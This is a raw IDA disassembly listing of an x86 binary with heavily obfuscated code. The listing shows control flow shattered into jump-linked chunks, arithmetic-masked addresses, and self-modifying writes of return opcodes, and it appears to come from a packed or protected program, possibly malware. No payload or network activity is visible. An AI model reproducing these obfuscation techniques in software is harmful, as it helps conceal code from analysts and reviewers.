; START	OF FUNCTION CHUNK FOR sub_450AA8

loc_43D1F1:				; CODE XREF: sub_450AA8:loc_43CD79j
		jnz	loc_44A8F9
		jmp	loc_4577AD
; END OF FUNCTION CHUNK	FOR sub_450AA8
; ---------------------------------------------------------------------------

locret_43D1FC:				; CODE XREF: hvvrg7ie:loc_43C2EEj
		retn
; ---------------------------------------------------------------------------
		jmp	ds:off_41D01C
; ---------------------------------------------------------------------------

loc_43D203:				; CODE XREF: hvvrg7ie:00439E1Ej
		jmp	sub_439E6C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F98C

loc_43D208:				; CODE XREF: sub_43F98C:loc_442792j
					; sub_446B4C:loc_44B88Ej ...
		pop	edx
		jns	loc_450F0D
		mov	eax, [esp-4+arg_0]
		push	edx
		push	offset loc_45935D
		jmp	loc_4525F7
; END OF FUNCTION CHUNK	FOR sub_43F98C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44370F

loc_43D21D:				; CODE XREF: sub_44370F:loc_442974j
					; sub_44370F-D81j
		add	esi, 41AC0B3Bh
		mov	[esi], eax
		pop	esi
		lea	eax, sub_44370F
		mov	byte ptr [eax],	0C3h
		jmp	loc_451C5F
; ---------------------------------------------------------------------------

loc_43D234:				; CODE XREF: sub_44370Fj
		pop	edx
		jmp	loc_451F2D
; END OF FUNCTION CHUNK	FOR sub_44370F
; ---------------------------------------------------------------------------

loc_43D23A:				; CODE XREF: hvvrg7ie:00459947j
		jb	loc_44972E
		add	ebp, ecx
		jmp	loc_450880

; =============== S U B	R O U T	I N E =======================================



sub_43D247	proc near		; CODE XREF: sub_444F71+Ap
					; hvvrg7ie:00446CA4j

; FUNCTION CHUNK AT 004459C3 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0044661B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B898 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00453DFE SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00453FA0 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00456A96 SIZE 0000000B BYTES

		xchg	esi, [esp+0]
		pop	esi
		or	eax, eax
		jnz	loc_453FA0
		jmp	loc_44661B
sub_43D247	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4403B6

loc_43D258:				; CODE XREF: sub_4403B6:loc_4403C1j
		and	eax, 4FF60482h

loc_43D25E:				; CODE XREF: sub_45038B:loc_45AFE8j
		sub	eax, 8E72EC93h
		or	eax, 94DA8231h
		and	eax, 2AEE008Dh
		add	eax, 0FF5A885Bh
		mov	eax, [eax]
		or	eax, eax
		jmp	loc_456125
; END OF FUNCTION CHUNK	FOR sub_4403B6
; ---------------------------------------------------------------------------

locret_43D27F:				; CODE XREF: hvvrg7ie:00458EEBj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C0DE

loc_43D280:				; CODE XREF: sub_43C0DE+13DC5j
		jmp	loc_446A5A
; END OF FUNCTION CHUNK	FOR sub_43C0DE

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_43D285	proc near		; CODE XREF: sub_456423j

var_20		= dword	ptr -20h
var_18		= dword	ptr -18h
var_14		= dword	ptr -14h
var_8		= dword	ptr -8

; FUNCTION CHUNK AT 004392F5 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00439FA9 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0043A01F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043A2FE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043A53B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043AA94 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0043B234 SIZE 00000004 BYTES
; FUNCTION CHUNK AT 0043BA98 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0043C10E SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0043CE0D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043D0D1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043DFA3 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0043EEC5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044000A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00441C67 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00442259 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443292 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004439C6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004439D6 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00443C69 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0044408E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044449E SIZE 00000024 BYTES
; FUNCTION CHUNK AT 004444E8 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 004445DE SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00444916 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00444E44 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004452CE SIZE 00000024 BYTES
; FUNCTION CHUNK AT 004456A9 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 004463EE SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00446D6A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00446E1F SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00447D2C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004494CE SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044A521 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044B743 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044BB9F SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044C36B SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0044C872 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044CB11 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0044CC8A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D133 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044ED91 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044EDA7 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00450B7E SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00450D10 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004510A6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452223 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452FF7 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00453095 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00453B09 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00453BB5 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00453DB5 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045412C SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0045451F SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00454A86 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454ABB SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004556C9 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004558DC SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0045641D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456C71 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0045767F SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00458119 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00458515 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0045A947 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0045AE39 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0045B54F SIZE 00000018 BYTES

		push	ebp
		mov	ebp, esp
		add	esp, 0FFFFFFECh
		cmp	ds:byte_451094,	0
		jnz	loc_454F9C
		lea	edx, [ebp+var_14]
		jmp	loc_44449E
sub_43D285	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		test	edi, 0F50AF473h
		jmp	loc_43B4DA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451442

loc_43D2AB:				; CODE XREF: sub_451442:loc_4449E0j
		xchg	edi, [esp+4+var_4]
; END OF FUNCTION CHUNK	FOR sub_451442
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_43D2AE:				; CODE XREF: sub_43F227-7ADj
		mov	esp, ebp

loc_43D2B0:				; CODE XREF: hvvrg7ie:00442F49j
		xchg	ebx, [esp+4+var_4]
		mov	ebp, ebx
		pop	ebx
		mov	eax, ds:dword_458D8C
		jmp	loc_4464B6
; END OF FUNCTION CHUNK	FOR sub_43F227
; ---------------------------------------------------------------------------

loc_43D2C1:				; CODE XREF: hvvrg7ie:loc_457FD2j
		pop	eax
		pop	ebx
		xchg	eax, [esp]
		push	eax
		add	ecx, 0AD4235C4h
		jmp	loc_453206
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_236. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DB4C

loc_43D2D3:				; CODE XREF: sub_43DB4C+Dj
		jmp	loc_45B22C
; END OF FUNCTION CHUNK	FOR sub_43DB4C

; =============== S U B	R O U T	I N E =======================================



sub_43D2D8	proc near		; CODE XREF: sub_43AF96+7p
					; hvvrg7ie:0044B186j

; FUNCTION CHUNK AT 00449B28 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045855C SIZE 0000001F BYTES

		xchg	esi, [esp+0]
		pop	esi
		push	edx
		push	ecx
		jmp	loc_449B28
sub_43D2D8	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C354

loc_43D2E3:				; CODE XREF: sub_43C354+F612j
		mov	eax, 0FD20E62h
		shl	ecx, 1Bh
		sbb	ebp, 0C48DB6A0h
		jmp	loc_43B0D9
; END OF FUNCTION CHUNK	FOR sub_43C354
; ---------------------------------------------------------------------------
		mov	ds:dword_41D0F0, eax
		lea	eax, nullsub_429
		mov	byte ptr [eax],	0C3h
		jmp	loc_457470

; =============== S U B	R O U T	I N E =======================================



sub_43D30A	proc near		; CODE XREF: sub_4031FD+E0p
					; sub_404A3E+FCp ...

; FUNCTION CHUNK AT 004395C1 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0043CB4C SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0043E8A9 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00440090 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004499AF SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044B53E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C950 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0044EC88 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00450B53 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 004583BB SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045A401 SIZE 00000013 BYTES

		js	loc_4583BB
		mov	eax, ds:dword_45B508
		push	offset sub_4404E7
		jmp	nullsub_33
sub_43D30A	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45061E

loc_43D320:				; CODE XREF: sub_45061E:loc_4491C0j
		and	edi, 86F26187h
		or	edi, 557E5187h
		xor	edi, 6CEEC9AAh
		add	eax, edi
		pop	edi
		rol	eax, 1Eh
		xor	eax, 4A987DD7h
		jmp	loc_43D50A
; END OF FUNCTION CHUNK	FOR sub_45061E

; =============== S U B	R O U T	I N E =======================================



sub_43D343	proc near		; DATA XREF: sub_458C3B+1Bo
		pop	ebx
		lea	eax, sub_445B46
		mov	byte ptr [eax],	0C3h
		jmp	sub_445B46
sub_43D343	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445B46

loc_43D352:				; CODE XREF: sub_445B46j
		xchg	esi, [esp+0]
		jmp	loc_43911E
; END OF FUNCTION CHUNK	FOR sub_445B46
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A6B5

loc_43D35A:				; CODE XREF: sub_44A6B5:loc_439E67j
		add	ecx, 0BED80B4Dh
		xchg	ecx, [esp+4+var_4]
		jmp	loc_45813D
; END OF FUNCTION CHUNK	FOR sub_44A6B5
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_199. PRESS KEYPAD	"+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================



sub_43D369	proc near		; DATA XREF: hvvrg7ie:00447A6Do
		mov	edi, esi
		push	offset loc_4540EA
		jmp	loc_454542
sub_43D369	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CEC8

loc_43D375:				; CODE XREF: sub_44CEC8:loc_455870j
		lea	eax, sub_443AE2
		mov	byte ptr [eax],	0C3h
		jmp	sub_443AE2
; END OF FUNCTION CHUNK	FOR sub_44CEC8
; ---------------------------------------------------------------------------

loc_43D383:				; CODE XREF: hvvrg7ie:loc_4474C3j
		mov	eax, [esp]

loc_43D386:				; CODE XREF: hvvrg7ie:loc_44DA46j
		call	sub_443FCC
; START	OF FUNCTION CHUNK FOR sub_44989C

loc_43D38B:				; CODE XREF: sub_44989C+5467j
		jmp	loc_445C98
; END OF FUNCTION CHUNK	FOR sub_44989C
; ---------------------------------------------------------------------------

loc_43D390:				; CODE XREF: hvvrg7ie:loc_43B90Aj
		mov	[ebp-10h], eax
		mov	eax, [ebp-10h]
		mov	eax, [eax+60h]
		jmp	loc_44BA1B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A87E

loc_43D39E:				; CODE XREF: sub_44A87E:loc_450CD1j
		xor	eax, eax
		mov	[ebp-0Ch], eax
		cmp	dword ptr [ebp-4], 0
		jz	loc_440EF1
		mov	eax, [ebp-4]
		jmp	loc_43AD7B
; END OF FUNCTION CHUNK	FOR sub_44A87E

; =============== S U B	R O U T	I N E =======================================



sub_43D3B5	proc near		; DATA XREF: hvvrg7ie:004592EDo

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043B763 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043BB9D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044BA48 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0045410E SIZE 0000001E BYTES

		push	6782977Ch
		xchg	edi, [esp+4+var_4]
		mov	edx, edi
		pop	edi
		or	edx, 0D5D9B995h
		cmp	edx, 0A6B6D087h
		jmp	loc_43B763
sub_43D3B5	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		adc	eax, 6C9D3E6Bh
; START	OF FUNCTION CHUNK FOR sub_454099

loc_43D3D7:				; CODE XREF: sub_454099:loc_45A3A1j
		or	esi, 0D5A46AEDh
		rol	esi, 0Eh
		or	esi, 9196FC01h
		add	esi, 4085896Ch
		jmp	loc_453D5E
; END OF FUNCTION CHUNK	FOR sub_454099
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45889B

loc_43D3F1:				; CODE XREF: sub_45889B-8DCDj
		call	sub_4590E0

loc_43D3F6:				; DATA XREF: sub_44531A:loc_44793Fo
		pop	edi
		mov	eax, [eax]
		mov	eax, [eax+60h]
		jmp	loc_439F4B
; END OF FUNCTION CHUNK	FOR sub_45889B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448100

loc_43D401:				; CODE XREF: sub_448100:loc_439279j
		xor	eax, eax
		mov	[ebp-10h], eax
		jmp	loc_447897
; END OF FUNCTION CHUNK	FOR sub_448100
; ---------------------------------------------------------------------------

loc_43D40B:				; CODE XREF: hvvrg7ie:loc_450F92j
		and	edi, eax
		jmp	loc_443846
; ---------------------------------------------------------------------------

loc_43D412:				; CODE XREF: hvvrg7ie:loc_45A575j
					; hvvrg7ie:0045AA60j
		call	sub_44DE0A
		mov	edx, 0C90D1845h
; START	OF FUNCTION CHUNK FOR sub_43D964

loc_43D41C:				; CODE XREF: sub_43D964+17367j
		call	sub_446A16
		push	eax
		push	offset sub_45048C
		jmp	loc_455F03
; END OF FUNCTION CHUNK	FOR sub_43D964
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44191F

loc_43D42C:				; CODE XREF: sub_44191F+2E6Cj
		mov	[ebp-10h], eax
		push	offset loc_4553B7
		jmp	loc_448072
; END OF FUNCTION CHUNK	FOR sub_44191F
; ---------------------------------------------------------------------------

loc_43D439:				; CODE XREF: hvvrg7ie:00454A16j
		and	edx, ebx
		test	edi, ecx
		jmp	loc_45841E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4413A5

loc_43D442:				; CODE XREF: sub_4413A5-1422j
		rol	eax, 0Bh
		add	eax, 5DFDD771h
		mov	eax, [eax]
		or	eax, eax
		jnz	loc_44AEE4
		jmp	loc_4540D1
; END OF FUNCTION CHUNK	FOR sub_4413A5
; ---------------------------------------------------------------------------
		xor	esi, eax
		jmp	sub_44524C
; ---------------------------------------------------------------------------
		mov	eax, 24CC2B1h
		call	sub_450C5A
		mov	ds:dword_41D194, eax
		lea	eax, nullsub_471
		jmp	loc_45B7E9
; ---------------------------------------------------------------------------

loc_43D47C:				; CODE XREF: hvvrg7ie:004550C5j
		sbb	ebx, esi

; =============== S U B	R O U T	I N E =======================================



sub_43D47E	proc near		; CODE XREF: sub_4527A1:loc_44DE4Ap

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_C		= dword	ptr  10h

; FUNCTION CHUNK AT 0043B0B4 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0043C9F3 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0043D64E SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0043F7CD SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00441B7E SIZE 00000019 BYTES
; FUNCTION CHUNK AT 004443E8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044490A SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0044B42B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454697 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00456B6B SIZE 00000005 BYTES

		xchg	edi, [esp+0]
		pop	edi
		add	edx, 2A5C1B9Bh
		xchg	edx, [esp-4+arg_0]
		jmp	loc_43D64E
sub_43D47E	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		shl	edi, 1Fh
		jmp	loc_4447CE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D140

loc_43D498:				; CODE XREF: sub_43D140:loc_448C3Fj
		xchg	eax, [esp-4+arg_0]
		call	sub_446D8D
		mov	eax, 0B2EE4EE4h
		push	edx
		jmp	loc_452E9A
; END OF FUNCTION CHUNK	FOR sub_43D140
; ---------------------------------------------------------------------------
		cmp	edx, 0A4BFE17Ch
		jmp	loc_44F7B2
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_452. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EA21

loc_43D4B7:				; CODE XREF: sub_43EA21:loc_4588ACj
		shr	edx, 3
		mov	ecx, ds:dword_448D10
		or	[ecx+edx], al
		mov	ecx, [ebp-18h]
		and	ecx, 7
		mov	al, 1
		jmp	loc_448E38
; END OF FUNCTION CHUNK	FOR sub_43EA21
; ---------------------------------------------------------------------------

loc_43D4D0:				; CODE XREF: hvvrg7ie:00445E20j
		sbb	ecx, esi

; =============== S U B	R O U T	I N E =======================================



sub_43D4D2	proc near		; CODE XREF: sub_440C05:loc_449F24p

arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 0043A136 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0043B881 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044D387 SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		pop	edx
		mov	eax, [esp+0]
		push	edx
		call	sub_446D8D
		jmp	loc_44D387
sub_43D4D2	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B7B9

loc_43D4E5:				; CODE XREF: sub_43B7B9+10j
		mov	eax, [esp+0]
		push	edx
		call	sub_45AB9D
		mov	eax, 0F074E076h
		push	edi
		jmp	loc_448742
; END OF FUNCTION CHUNK	FOR sub_43B7B9
; ---------------------------------------------------------------------------
		jg	loc_43D86C
		jmp	sub_4574EE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445F5B

loc_43D504:				; CODE XREF: sub_445F5B:loc_44B61Bj
		mov	ebp, eax
		pop	eax
		retn	4
; END OF FUNCTION CHUNK	FOR sub_445F5B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45061E

loc_43D50A:				; CODE XREF: sub_45061E-132E0j
		jmp	loc_4418E6
; END OF FUNCTION CHUNK	FOR sub_45061E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_439549

loc_43D50F:				; CODE XREF: sub_439549+Ej
					; sub_4538F3-4099j ...
		call	sub_45480F

loc_43D514:				; CODE XREF: sub_453405:loc_455898j
		jmp	loc_44243F
; END OF FUNCTION CHUNK	FOR sub_439549
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43A89A

loc_43D519:				; CODE XREF: sub_43A89A+A710j
		jmp	sub_458A13
; END OF FUNCTION CHUNK	FOR sub_43A89A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449466

loc_43D51E:				; CODE XREF: sub_449466-AB5Cj
		jmp	loc_441204
; END OF FUNCTION CHUNK	FOR sub_449466
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447610

loc_43D523:				; CODE XREF: sub_447610:loc_4589BEj
		ror	esi, 11h
		jmp	loc_43A6D6
; END OF FUNCTION CHUNK	FOR sub_447610
; ---------------------------------------------------------------------------

locret_43D52B:				; CODE XREF: hvvrg7ie:loc_445B52j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451E6D

loc_43D52C:				; CODE XREF: sub_451E6D-71D6j
		jmp	loc_441CC7
; END OF FUNCTION CHUNK	FOR sub_451E6D

; =============== S U B	R O U T	I N E =======================================



sub_43D531	proc near		; DATA XREF: sub_444F80:loc_449D01o

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043917C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043A1FF SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0043BE41 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043BFFD SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0043C164 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00440328 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00440CFD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00442125 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00442AB8 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 00443586 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00444016 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004451E2 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00446D84 SIZE 00000004 BYTES
; FUNCTION CHUNK AT 00447C45 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 00449BB1 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0044A53E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044BF74 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D945 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0045074B SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004508A2 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00455163 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00455D2F SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00455F23 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456643 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00457BA7 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 004582E8 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045905C SIZE 0000000E BYTES

		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_44D945
		jmp	loc_455F23
sub_43D531	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_43D540:				; DATA XREF: sub_451176-B732o
		add	esi, 0B62D4155h
		xchg	esi, [esp]
		jmp	sub_446A16
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440643

loc_43D54E:				; CODE XREF: sub_440643+10087j
		jl	loc_453A86

loc_43D554:				; CODE XREF: hvvrg7ie:0043B4E0j
		mov	edi, [edx]
		jmp	loc_453A7C
; END OF FUNCTION CHUNK	FOR sub_440643
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A2CE

loc_43D55B:				; CODE XREF: sub_45A2CE-EAAFj
		lea	eax, loc_453328
		mov	byte ptr [eax],	0C3h
		jmp	loc_43BA93
; END OF FUNCTION CHUNK	FOR sub_45A2CE

; =============== S U B	R O U T	I N E =======================================



sub_43D569	proc near		; CODE XREF: sub_41A40D+2Ep
					; sub_43D569+5j
					; DATA XREF: ...
		call	sub_43D574
		jmp	ds:off_41D03C
sub_43D569	endp


; =============== S U B	R O U T	I N E =======================================



sub_43D574	proc near		; CODE XREF: sub_43D569p
					; hvvrg7ie:00444CD7j ...

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043BDE6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004442D6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00444CDC SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00449E48 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00456A24 SIZE 00000027 BYTES
; FUNCTION CHUNK AT 0045982C SIZE 0000000C BYTES

		pop	edx
		jns	loc_444CDC
		mov	eax, [esp-4+arg_0]
		push	edi
		jmp	loc_45982C
sub_43D574	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_43D584:				; CODE XREF: hvvrg7ie:00445483j
		jnz	loc_44259D
; START	OF FUNCTION CHUNK FOR sub_454789

loc_43D58A:				; CODE XREF: sub_454789+6BD7j
		jmp	loc_4489DF
; END OF FUNCTION CHUNK	FOR sub_454789
; ---------------------------------------------------------------------------
		or	ecx, 0AAC98EEFh
		ja	loc_45003B
		jl	sub_459A95
		jmp	loc_442597
; ---------------------------------------------------------------------------

loc_43D5A6:				; DATA XREF: sub_44CE32+9o
		rol	eax, 18h
		push	ebp
		mov	ebp, ecx
		push	offset sub_450D32
		jmp	loc_446D54
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B8A4

loc_43D5B6:				; CODE XREF: sub_44B8A4:loc_44C23Cj
		or	eax, 8DD50A5Fh
		add	eax, 2064D1B1h
		xchg	eax, [esp+4+var_4]
		jmp	loc_44EC4D
; END OF FUNCTION CHUNK	FOR sub_44B8A4
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_31. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_43D5CB:				; CODE XREF: hvvrg7ie:loc_439CC4j
		xchg	ebx, [esp]
		jmp	sub_450C5A
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_165. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F272

loc_43D5D4:				; CODE XREF: sub_43F272+871Dj
		jmp	nullsub_62
; END OF FUNCTION CHUNK	FOR sub_43F272
; ---------------------------------------------------------------------------

loc_43D5D9:				; CODE XREF: hvvrg7ie:00444511j
		jmp	nullsub_539
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44ABA3

loc_43D5DE:				; CODE XREF: sub_44ABA3-D146j
		jmp	loc_43DE97
; END OF FUNCTION CHUNK	FOR sub_44ABA3
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_380. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_43D5E4:				; CODE XREF: hvvrg7ie:0044BABBj
		jmp	loc_44D684
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459E78

loc_43D5E9:				; CODE XREF: sub_459E78-18D47j
		jmp	nullsub_387
; END OF FUNCTION CHUNK	FOR sub_459E78
; ---------------------------------------------------------------------------
		push	eax
		ror	eax, 14h
		mov	ds:dword_439C98, eax
		jmp	locret_4487DB

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_43D5FD	proc near		; CODE XREF: sub_452AE5j

var_18		= dword	ptr -18h
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00440376 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00440B24 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 004422F2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044681D SIZE 0000000C BYTES
; FUNCTION CHUNK AT 004487C1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004487E6 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044A312 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C3FE SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00451DF3 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0045393F SIZE 00000032 BYTES
; FUNCTION CHUNK AT 00453BF4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004541B9 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 004561AA SIZE 00000017 BYTES
; FUNCTION CHUNK AT 004565DF SIZE 00000015 BYTES
